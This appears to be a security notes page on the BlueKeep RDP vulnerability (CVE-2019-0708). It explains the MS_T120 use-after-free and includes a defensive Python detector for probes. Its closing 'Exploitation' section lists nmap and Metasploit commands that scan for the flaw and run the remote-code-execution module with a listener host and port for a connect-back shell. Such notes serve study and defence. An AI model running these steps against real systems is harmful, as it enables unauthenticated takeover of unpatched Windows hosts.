CVE-2019-0708: BlueKeep
BlueKeep is a critical vulnerability in the Remote Desktop Protocol (RDP) implementation of Windows that allows an unauthenticated remote attacker to execute arbitrary code, potentially gaining full control of the host and a foothold in the network. Disclosed by Microsoft in May 2019, the flaw is a memory-corruption bug in the kernel-mode RDP driver that is reachable before authentication. A patch was released on May 14, 2019, but many systems, including Windows XP, Vista, 7, and Server 2008 R2, remained vulnerable at the time. Over 1 million systems worldwide were at risk when the vulnerability was discovered.
Why the Vulnerability Occurs
The vulnerability affects Microsoft’s Remote Desktop Services (formerly Terminal Services), which lets users access a Windows system remotely over the Remote Desktop Protocol (RDP) on port 3389/TCP. The flaw is triggered during the "MCS Connect Initial and GCC Create" request, part of the RDP connection sequence, in which the client lists the virtual channels it wants to open. A use-after-free in the RDP kernel driver (termdd.sys) can be reached when a client binds the internal "MS_T120" channel (which the server normally reserves for itself) and sends crafted data to it. This results in arbitrary code execution with administrative privileges.
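Because the trigger is a client that names "MS_T120" in its channel list, a defender can spot probes at the connection-setup stage. The following added example (not part of the original page) parses the Client Network Data block (TS_UD_CS_NET, as laid out in MS-RDPBCGR) from a client Connect Initial PDU and flags any request for that channel; the surrounding framing bytes and the two sample PDUs are constructed for the demonstration, not real captures.

```python
import struct
from typing import List, Optional

CS_NET = 0xC003           # TS_UD_HEADER type of Client Network Data (MS-RDPBCGR 2.2.1.3.4)
CHANNEL_DEF_LEN = 12      # CHANNEL_DEF = 8-byte ANSI name + 4-byte options
SUSPICIOUS = {"ms_t120"}  # internal channel; legitimate clients never request it by name

def parse_cs_net(buf: bytes, offset: int) -> Optional[List[str]]:
    """Parse a TS_UD_CS_NET block at offset; return requested channel names, or None if malformed."""
    if offset + 8 > len(buf):
        return None
    hdr_type, hdr_len, count = struct.unpack_from("<HHI", buf, offset)
    if hdr_type != CS_NET or hdr_len != 8 + CHANNEL_DEF_LEN * count or offset + hdr_len > len(buf):
        return None
    names = []
    for i in range(count):
        start = offset + 8 + i * CHANNEL_DEF_LEN
        raw_name = buf[start:start + 8]          # null-padded only when shorter than 8 bytes
        names.append(raw_name.split(b"\x00", 1)[0].decode("ascii", errors="replace"))
    return names

def find_channels(pdu: bytes) -> List[str]:
    """Locate the CS_NET block inside a client Connect Initial PDU and list the channels it asks for."""
    pos = pdu.find(b"\x03\xc0")                  # 0xC003 in little-endian byte order
    while pos != -1:
        names = parse_cs_net(pdu, pos)
        if names is not None:                    # first candidate that passes the length sanity check
            return names
        pos = pdu.find(b"\x03\xc0", pos + 1)
    return []

def flag_bluekeep_probe(pdu: bytes) -> List[str]:
    """Return the requested channel names that match the BlueKeep indicator (case-insensitive MS_T120)."""
    return [n for n in find_channels(pdu) if n.lower() in SUSPICIOUS]

# --- constructed sample data (assumption: not taken from real traffic) ---
def build_cs_net(names: List[str]) -> bytes:
    body = b"".join(n.encode("ascii").ljust(8, b"\x00") + struct.pack("<I", 0x80000000) for n in names)
    return struct.pack("<HHI", CS_NET, 8 + len(body), len(names)) + body

FRAMING = b"\x7f\x65" + b"\x00" * 4              # stand-in for the BER Connect-Initial wrapper and core data
BENIGN_PDU = FRAMING + build_cs_net(["rdpdr", "cliprdr", "rdpsnd"])
PROBE_PDU = FRAMING + build_cs_net(["rdpdr", "MS_T120", "cliprdr"])

if __name__ == "__main__":
    print("benign:", flag_bluekeep_probe(BENIGN_PDU))   # []
    print("probe: ", flag_bluekeep_probe(PROBE_PDU))    # ['MS_T120']
```

The same check is what network IDS signatures for this CVE implement; note that it only sees the unencrypted connection-setup phase, so it complements (rather than replaces) patching and enforcing NLA.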
Exploitation
MSF
# enumeration with nmap
sudo nmap -Pn -sV -O [IP]
# vulnerability scan
msfconsole -q
search bluekeep
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
show options
set RHOSTS [IP]
run
# exploitation (only works in x64)
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
show options
set RHOSTS [IP]
set LHOST [Listening IP]
set LPORT [Listening Port]
# Exploit may fail with "Bad config" when the target was not auto-detected. Pick the target manually.
show targets
set target [target index]
run
Others